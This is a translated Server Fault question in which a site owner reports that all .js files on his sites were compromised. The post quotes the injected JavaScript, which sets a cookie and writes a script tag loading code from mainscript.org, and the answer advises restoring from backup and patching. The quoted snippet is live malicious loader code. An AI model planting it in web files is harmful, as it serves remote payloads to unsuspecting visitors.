通過在 .js 文件中插入程式碼來入侵網站

December 5, 2012

可能重複：
我的伺服器被黑了緊急
似乎有人通過在所有 .js 文件中插入程式碼來入侵我擁有的一堆網站。
function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('&lt;script src="http://mainscript.org/mainscript.js"&gt;&lt;/script&gt;');}
我想知道他怎麼能做到這一點，因為我擁有伺服器並且我已經啟動了 mod_sec，許多功能被禁用並且我認為安全性非常好。
有小費嗎？想法？我只是想在這裡集思廣益。

最好的辦法是關閉網站。從備份恢復，然後修補伺服器/站點/軟體等。

引用自：https://serverfault.com/questions/455266

通過在 .js 文件中插入程式碼來入侵網站

相關問答

所有這些請求是什麼？

安全更新是與 `dnf update` 一起應用的，還是在 Linux 中是單獨的程序？

SSHD：日誌文件中“連接關閉…”和“從…斷開連接”之間的區別

我的網站被一個怪胎黑客用作網路釣魚網站！我能做些什麼？

.htaccess 被反復入侵

報告的攻擊頁面：如何解決此問題

通過在 .js 文件中插入程式碼來入侵網站

相關問答

所有這些請求是什麼？

安全更新是與 dnf update 一起應用的，還是在 Linux 中是單獨的程序？

SSHD：日誌文件中“連接關閉…”和“從…斷開連接”之間的區別

我的網站被一個怪胎黑客用作網路釣魚網站！我能做些什麼？

.htaccess 被反復入侵

報告的攻擊頁面：如何解決此問題

安全更新是與 `dnf update` 一起應用的，還是在 Linux 中是單獨的程序？